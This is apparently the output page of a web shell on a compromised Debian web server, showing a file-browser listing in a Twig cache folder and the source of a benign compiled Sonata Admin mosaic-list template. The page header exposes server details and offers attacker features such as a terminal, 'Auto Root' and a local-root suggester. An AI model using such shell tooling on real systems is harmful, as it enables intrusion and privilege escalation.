Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
var /
cache /
.!!QgY /
twig /
f7 /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
f708eb26346fa0bb9499813a5f6eded4.php
18.41
KB
-rwxrwxr-x
2026-05-18 12:54
f75d048daca5515cc1fecc5590fd61bd.php
9.78
KB
-rwxrwxr-x
2026-05-18 12:54
f785c0f71b251af5f63814de7a272c3f.php
2.94
KB
-rwxrwxr-x
2026-05-18 12:54
f7c20d1e2739be22ff68eb121fc4309c.php
2.72
KB
-rwxrwxr-x
2026-05-18 12:54
f7ffe5f8a561095c83c446de8118d144.php
4.9
KB
-rwxrwxr-x
2026-05-18 12:54
Save
Rename
<?php use Twig\Environment; use Twig\Error\LoaderError; use Twig\Error\RuntimeError; use Twig\Extension\CoreExtension; use Twig\Extension\SandboxExtension; use Twig\Markup; use Twig\Sandbox\SecurityError; use Twig\Sandbox\SecurityNotAllowedTagError; use Twig\Sandbox\SecurityNotAllowedFilterError; use Twig\Sandbox\SecurityNotAllowedFunctionError; use Twig\Source; use Twig\Template; use Twig\TemplateWrapper; /* @SonataAdmin/CRUD/list_outer_rows_mosaic.html.twig */ class __TwigTemplate_be863a18b4027b340c5d1a8c9fc36673 extends Template { private Source $source; /** * @var array<string, Template> */ private array $macros = []; public function __construct(Environment $env) { parent::__construct($env); $this->source = $this->getSourceContext(); $this->parent = false; $this->blocks = [ 'sonata_mosaic_background' => [$this, 'block_sonata_mosaic_background'], 'sonata_mosaic_default_view' => [$this, 'block_sonata_mosaic_default_view'], 'sonata_mosaic_hover_view' => [$this, 'block_sonata_mosaic_hover_view'], 'sonata_mosaic_description' => [$this, 'block_sonata_mosaic_description'], ]; } protected function doDisplay(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 11 yield " <!-- This template can be customized to match your needs. You should only extends the template and used the different blocks to customize the view: - sonata_mosaic_default_view - sonata_mosaic_hover_view - sonata_mosaic_description --> <tr> "; // line 21 yield " <td colspan=\""; yield (((($tmp = CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, // line 22 ($context["app"] ?? null), "request", [], "any", false, false, false, 22), "isXmlHttpRequest", [], "any", false, false, false, 22)) && $tmp instanceof Markup ? (string) $tmp : $tmp)) ? ($this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(((Twig\Extension\CoreExtension::length($this->env->getCharset(), Twig\Extension\CoreExtension::filter($this->env, CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, // line 23 ($context["admin"] ?? null), "list", [], "any", false, false, false, 23), "getElements", [], "method", false, false, false, 23), function ($__element__) use ($context, $macros) { $context["element"] = $__element__; return (CoreExtension::getAttribute($this->env, $this->source, ($context["element"] ?? null), "getOption", ["ajax_hidden"], "method", false, false, false, 23) != true); })) - CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, // line 24 ($context["admin"] ?? null), "list", [], "any", false, false, false, 24), "has", [Twig\Extension\CoreExtension::constant("Sonata\\AdminBundle\\Datagrid\\ListMapper::NAME_ACTIONS")], "method", false, false, false, 24)) - CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, // line 25 ($context["admin"] ?? null), "list", [], "any", false, false, false, 25), "has", [Twig\Extension\CoreExtension::constant("Sonata\\AdminBundle\\Datagrid\\ListMapper::NAME_BATCH")], "method", false, false, false, 25)), "html", null, true)) : ($this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(Twig\Extension\CoreExtension::length($this->env->getCharset(), CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, // line 26 ($context["admin"] ?? null), "list", [], "any", false, false, false, 26), "getElements", [], "method", false, false, false, 26)), "html", null, true))); // line 27 yield "\"> <div class=\"row\"> "; // line 29 $context['_parent'] = $context; $context['_seq'] = CoreExtension::ensureTraversable(CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, ($context["admin"] ?? null), "datagrid", [], "any", false, false, false, 29), "results", [], "any", false, false, false, 29)); $context['loop'] = [ 'parent' => $context['_parent'], 'index0' => 0, 'index' => 1, 'first' => true, ]; if (is_array($context['_seq']) || (is_object($context['_seq']) && $context['_seq'] instanceof \Countable)) { $length = count($context['_seq']); $context['loop']['revindex0'] = $length - 1; $context['loop']['revindex'] = $length; $context['loop']['length'] = $length; $context['loop']['last'] = 1 === $length; } foreach ($context['_seq'] as $context["_key"] => $context["object"]) { // line 30 yield " "; $context["meta"] = CoreExtension::getAttribute($this->env, $this->source, ($context["admin"] ?? null), "getObjectMetadata", [$context["object"]], "method", false, false, false, 30); // line 31 yield " "; $context["mosaic_content"] = ('' === $tmp = \Twig\Extension\CoreExtension::captureOutput((function () use (&$context, $macros, $blocks) { // line 32 yield " <div class=\"mosaic-box-outter\"> <div class=\"mosaic-inner-box\"> "; // line 37 yield " <div class=\"mosaic-inner-box-default\"> "; // line 39 yield from $this->unwrap()->yieldBlock('sonata_mosaic_background', $context, $blocks); // line 46 yield " "; yield from $this->unwrap()->yieldBlock('sonata_mosaic_default_view', $context, $blocks); // line 49 yield " </div> "; // line 55 yield " <div class=\"mosaic-inner-box-hover\"> "; // line 56 yield from $this->unwrap()->yieldBlock('sonata_mosaic_hover_view', $context, $blocks); // line 60 yield " </div> </div> <div class=\"mosaic-inner-text\"> "; // line 64 if (((CoreExtension::getAttribute($this->env, $this->source, ($context["admin"] ?? null), "hasRoute", ["batch"], "method", false, false, false, 64) && (Twig\Extension\CoreExtension::length($this->env->getCharset(), ($context["batchactions"] ?? null)) > 0)) || ((CoreExtension::getAttribute($this->env, $this->source, ($context["admin"] ?? null), "hasRoute", ["export"], "method", false, false, false, 64) && CoreExtension::getAttribute($this->env, $this->source, ($context["admin"] ?? null), "hasAccess", ["export"], "method", false, false, false, 64)) && Twig\Extension\CoreExtension::length($this->env->getCharset(), ($context["export_formats"] ?? null))))) { // line 65 yield " <input type=\"checkbox\" name=\"idx[]\" value=\""; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, ($context["admin"] ?? null), "id", [$context["object"]], "method", false, false, false, 65), "html", null, true); yield "\"> "; } else { // line 67 yield " "; } // line 69 yield " "; // line 70 yield from $this->unwrap()->yieldBlock('sonata_mosaic_description', $context, $blocks); // line 73 yield " </div> </div> "; yield from []; })())) ? '' : new Markup($tmp, $this->env->getCharset()); // line 76 yield " <div class=\"col-xs-6 col-sm-3 mosaic-box sonata-ba-list-field-batch sonata-ba-list-field\" objectId=\""; // line 77 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, ($context["admin"] ?? null), "id", [$context["object"]], "method", false, false, false, 77), "html", null, true); yield "\"> "; // line 78 if ((CoreExtension::getAttribute($this->env, $this->source, ($context["admin"] ?? null), "hasAccess", ["edit", $context["object"]], "method", false, false, false, 78) && CoreExtension::getAttribute($this->env, $this->source, ($context["admin"] ?? null), "hasRoute", ["edit"], "method", false, false, false, 78))) { // line 79 yield " <a class=\"mosaic-inner-link\" href=\""; // line 80 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, ($context["admin"] ?? null), "generateObjectUrl", ["edit", $context["object"]], "method", false, false, false, 80), "html", null, true); yield "\"> "; // line 81 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(($context["mosaic_content"] ?? null), "html", null, true); yield " </a> "; } elseif ((CoreExtension::getAttribute($this->env, $this->source, // line 83 ($context["admin"] ?? null), "hasAccess", ["show", $context["object"]], "method", false, false, false, 83) && CoreExtension::getAttribute($this->env, $this->source, ($context["admin"] ?? null), "hasRoute", ["show"], "method", false, false, false, 83))) { // line 84 yield " <a class=\"mosaic-inner-link\" href=\""; // line 85 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, ($context["admin"] ?? null), "generateObjectUrl", ["show", $context["object"]], "method", false, false, false, 85), "html", null, true); yield "\"> "; // line 86 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(($context["mosaic_content"] ?? null), "html", null, true); yield " </a> "; } else { // line 89 yield " "; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(($context["mosaic_content"] ?? null), "html", null, true); yield " "; } // line 91 yield " </div> "; // line 93 if (((CoreExtension::getAttribute($this->env, $this->source, $context["loop"], "index", [], "any", false, false, false, 93) % 4) == 0)) { // line 94 yield " <div class=\"clearfix hidden-xs\"></div> "; } // line 96 yield " "; if (((CoreExtension::getAttribute($this->env, $this->source, $context["loop"], "index", [], "any", false, false, false, 96) % 2) == 0)) { // line 97 yield " <div class=\"clearfix visible-xs\"></div> "; } // line 99 yield " "; ++$context['loop']['index0']; ++$context['loop']['index']; $context['loop']['first'] = false; if (isset($context['loop']['revindex0'], $context['loop']['revindex'])) { --$context['loop']['revindex0']; --$context['loop']['revindex']; $context['loop']['last'] = 0 === $context['loop']['revindex0']; } } $_parent = $context['_parent']; unset($context['_seq'], $context['_key'], $context['object'], $context['_parent'], $context['loop']); $context = array_intersect_key($context, $_parent) + $_parent; // line 100 yield " </div> </td> </tr> "; yield from []; } // line 39 /** * @return iterable<null|scalar|\Stringable> */ public function block_sonata_mosaic_background(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 40 yield " "; $context["metaImage"] = (((CoreExtension::getAttribute($this->env, $this->source, ($context["meta"] ?? null), "isImageAvailable", [], "any", true, true, false, 40) && !CoreExtension::getAttribute($this->env, $this->source, ($context["meta"] ?? null), "isImageAvailable", [], "any", false, false, false, 40))) ? (CoreExtension::getAttribute($this->env, $this->source, ($context["sonata_config"] ?? null), "getOption", ["mosaic_background"], "method", false, false, false, 40)) : (CoreExtension::getAttribute($this->env, $this->source, ($context["meta"] ?? null), "image", [], "any", false, false, false, 40))); // line 41 yield " "; if ((($tmp = !(is_string($_v0 = ($context["metaImage"] ?? null)) && is_string($_v1 = "data:") && str_starts_with($_v0, $_v1))) && $tmp instanceof Markup ? (string) $tmp : $tmp)) { // line 42 yield " "; $context["metaImage"] = $this->extensions['Symfony\Bridge\Twig\Extension\AssetExtension']->getAssetUrl(($context["metaImage"] ?? null)); // line 43 yield " "; } // line 44 yield " <img src=\""; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(($context["metaImage"] ?? null), "html", null, true); yield "\" alt=\""; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, ($context["meta"] ?? null), "title", [], "any", false, false, false, 44), "html", null, true); yield "\" /> "; yield from []; } // line 46 /** * @return iterable<null|scalar|\Stringable> */ public function block_sonata_mosaic_default_view(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 47 yield " <span class=\"mosaic-box-label label label-primary pull-right\">#"; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, ($context["admin"] ?? null), "id", [($context["object"] ?? null)], "method", false, false, false, 47), "html", null, true); yield "</span> "; yield from []; } // line 56 /** * @return iterable<null|scalar|\Stringable> */ public function block_sonata_mosaic_hover_view(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 57 yield " <span class=\"mosaic-box-label label label-primary pull-right\">#"; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, ($context["admin"] ?? null), "id", [($context["object"] ?? null)], "method", false, false, false, 57), "html", null, true); yield "</span> "; // line 58 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, ($context["meta"] ?? null), "description", [], "any", false, false, false, 58), "html", null, true); yield " "; yield from []; } // line 70 /** * @return iterable<null|scalar|\Stringable> */ public function block_sonata_mosaic_description(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 71 yield " "; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, $this->extensions['Twig\Extra\String\StringExtension']->createUnicodeString(CoreExtension::getAttribute($this->env, $this->source, ($context["meta"] ?? null), "title", [], "any", false, false, false, 71)), "truncate", [40], "method", false, false, false, 71), "html", null, true); yield " "; yield from []; } /** * @codeCoverageIgnore */ public function getTemplateName(): string { return "@SonataAdmin/CRUD/list_outer_rows_mosaic.html.twig"; } /** * @codeCoverageIgnore */ public function isTraitable(): bool { return false; } /** * @codeCoverageIgnore */ public function getDebugInfo(): array { return array ( 294 => 71, 287 => 70, 280 => 58, 275 => 57, 268 => 56, 260 => 47, 253 => 46, 243 => 44, 240 => 43, 237 => 42, 234 => 41, 231 => 40, 224 => 39, 216 => 100, 202 => 99, 198 => 97, 195 => 96, 191 => 94, 189 => 93, 185 => 91, 179 => 89, 173 => 86, 169 => 85, 166 => 84, 164 => 83, 159 => 81, 155 => 80, 152 => 79, 150 => 78, 146 => 77, 143 => 76, 137 => 73, 135 => 70, 132 => 69, 128 => 67, 122 => 65, 120 => 64, 114 => 60, 112 => 56, 109 => 55, 105 => 49, 102 => 46, 100 => 39, 96 => 37, 92 => 32, 89 => 31, 86 => 30, 69 => 29, 65 => 27, 63 => 26, 62 => 25, 61 => 24, 60 => 23, 59 => 22, 57 => 21, 46 => 11,); } public function getSourceContext(): Source { return new Source("", "@SonataAdmin/CRUD/list_outer_rows_mosaic.html.twig", "/var/www/v3.cesa.co.za/vendor/sonata-project/admin-bundle/src/Resources/views/CRUD/list_outer_rows_mosaic.html.twig"); } }